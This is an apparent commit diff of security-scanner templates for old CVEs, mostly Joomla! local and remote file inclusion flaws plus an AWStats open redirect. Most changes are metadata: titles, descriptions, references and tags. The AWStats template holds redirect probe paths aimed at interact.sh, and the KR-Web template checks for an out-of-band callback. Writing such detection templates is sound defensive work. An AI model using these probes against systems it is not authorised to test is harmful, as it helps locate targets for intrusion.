name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-3053
tags: cve,cve2009,joomla,lfi
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
requests:
- method: GET
@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

10
cves/2009/CVE-2009-3318.yaml
View File

@ -1,16 +1,18 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
classification:
cve-id: CVE-2009-3318
tags: cve,cve2009,joomla,lfi
tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08

12
cves/2009/CVE-2009-4202.yaml
View File

@ -1,16 +1,18 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
- http://www.vupen.com/english/advisories/2009/1494
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
- http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
classification:
cve-id: CVE-2009-4202
tags: cve,cve2009,joomla,lfi,photo
tags: cve2009,joomla,lfi,photo,edb,cve
requests:
- method: GET
@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08

11
cves/2009/CVE-2009-4223.yaml
View File

@ -1,16 +1,19 @@
id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
name: KR-Web <=1.1b2 - Remote File Inclusion
author: geeknik
severity: high
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
- http://www.exploit-db.com/exploits/10216
- https://nvd.nist.gov/vuln/detail/CVE-2009-4223
classification:
cve-id: CVE-2009-4223
tags: cve,cve2009,krweb,rfi
tags: cve,cve2009,krweb,rfi,edb
requests:
- method: GET
@ -26,3 +29,5 @@ requests:
part: interactsh_protocol
words:
- "http"
# Enhanced by mp on 2022/06/06

11
cves/2009/CVE-2009-4679.yaml
View File

@ -1,16 +1,19 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
name: Joomla! Portfolio Nexus - Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: |
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
- http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
classification:
cve-id: CVE-2009-4679
tags: cve,cve2009,joomla,lfi,nexus
tags: cve,cve2009,joomla,lfi,nexus,edb
requests:
- method: GET
@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08

11
cves/2009/CVE-2009-5020.yaml
View File

@ -7,24 +7,25 @@ info:
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2009-5020
cwe-id: CWE-601
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2020,redirect,awstats
tags: cve,cve2009,redirect,awstats
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13

6
cves/2009/CVE-2009-5114.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
- http://websecurity.com.ua/2628/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2009-5114
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2009,lfi
tags: edb,cve,cve2009,lfi
requests:
- method: GET

6
cves/2010/CVE-2010-0157.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
- http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0157
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET

2
cves/2010/CVE-2010-0219.yaml
View File

@ -8,6 +8,8 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- http://www.vupen.com/english/advisories/2010/2673
classification:
cve-id: CVE-2010-0219
metadata:

6
cves/2010/CVE-2010-0467.yaml
View File

@ -8,13 +8,15 @@ info:
reference:
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
- http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
remediation: Apply all relevant security patches and upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2010-0467
cwe-id: CWE-22
remediation: Apply all relevant security patches and upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-0696.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
- http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/
- http://www.joomlaworks.gr/content/view/77/34/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0696
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-0759.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
- http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/
- http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0759
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi,plugin
tags: cve,cve2010,joomla,lfi,plugin,edb
requests:
- method: GET

5
cves/2010/CVE-2010-0942.yaml
View File

@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
- http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0942
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET

4
cves/2010/CVE-2010-0943.yaml
View File

@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
- http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
- http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/
classification:
cve-id: CVE-2010-0943
tags: cve,cve2010,joomla,lfi
tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET

6
cves/2010/CVE-2010-0944.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
- http://www.exploit-db.com/exploits/11088
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0944
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET

6
cves/2010/CVE-2010-0972.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
- http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/
- http://www.exploit-db.com/exploits/11738
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0972
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET

6
cves/2010/CVE-2010-0982.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
- http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
- http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0982
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-0985.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
- http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560
- http://www.exploit-db.com/exploits/10948
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0985
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1056.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
- http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/
- http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1056
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

5
cves/2010/CVE-2010-1081.yaml
View File

@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1081
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1217.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
- http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
- http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1217
remediation: Apply all relevant security patches and product upgrades.
tags: cve,cve2010,joomla,lfi,plugin
tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin
requests:
- method: GET

6
cves/2010/CVE-2010-1219.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
- http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952
- http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1219
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1302.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
- http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
- http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1302
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi,graph
tags: edb,cve,cve2010,joomla,lfi,graph
requests:
- method: GET

6
cves/2010/CVE-2010-1304.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
- http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174
- http://www.exploit-db.com/exploits/11998
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1304
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi,status
tags: cve2010,joomla,lfi,status,edb,cve
requests:
- method: GET

6
cves/2010/CVE-2010-1305.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
- http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1305
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: joomla,lfi,edb,cve,cve2010
requests:
- method: GET

6
cves/2010/CVE-2010-1306.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
- http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/
- http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1306
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1307.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
- http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/
- http://www.vupen.com/english/advisories/2010/0806
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1307
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET

5
cves/2010/CVE-2010-1308.yaml
View File

@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
- http://www.vupen.com/english/advisories/2010/0809
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1308
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1312.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
- http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1312
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET

6
cves/2010/CVE-2010-1313.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
- http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
- http://www.exploit-db.com/exploits/12082
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1313
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1314.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
- http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1314
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET

6
cves/2010/CVE-2010-1315.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
- http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/
- http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1315
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET

6
cves/2010/CVE-2010-1340.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
- http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/
- http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1340
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET

5
cves/2010/CVE-2010-1345.yaml
View File

@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
- http://www.exploit-db.com/exploits/11785
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1345
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: lfi,edb,cve,cve2010,joomla
requests:
- method: GET

6
cves/2010/CVE-2010-1352.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12084
- https://www.cvedetails.com/cve/CVE-2010-1352
- http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/
- http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1352
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET

4
cves/2010/CVE-2010-1353.yaml
View File

@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
- http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/
- http://www.vupen.com/english/advisories/2010/0808
classification:
cve-id: CVE-2010-1353
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1354.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
- http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt
- http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1354
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET

6
cves/2010/CVE-2010-1461.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
- http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504
- http://www.exploit-db.com/exploits/12232
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1461
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi,photo
tags: cve,cve2010,joomla,lfi,photo,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1469.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
- http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
- http://www.exploit-db.com/exploits/12146
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1469
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET

6
cves/2010/CVE-2010-1470.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
- http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/
- http://www.exploit-db.com/exploits/12166
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1470
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET

4
cves/2010/CVE-2010-1471.yaml
View File

@ -8,10 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
- http://www.vupen.com/english/advisories/2010/0862
classification:
cve-id: CVE-2010-1471
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1472.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
- http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/
- http://www.exploit-db.com/exploits/12167
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1472
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

6
cves/2010/CVE-2010-1473.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
- http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
- http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1473
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
tags: joomla,lfi,edb,packetstorm,cve,cve2010
requests:
- method: GET

4
cves/2010/CVE-2010-1474.yaml
View File

@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
- http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/
- http://www.exploit-db.com/exploits/12182
classification:
cve-id: CVE-2010-1474
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET

4
cves/2010/CVE-2010-1475.yaml
View File

@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
- http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/
- http://www.exploit-db.com/exploits/12147
classification:
cve-id: CVE-2010-1475
tags: cve,cve2010,joomla,lfi
tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET

Some files were not shown because too many files have changed in this diff Show More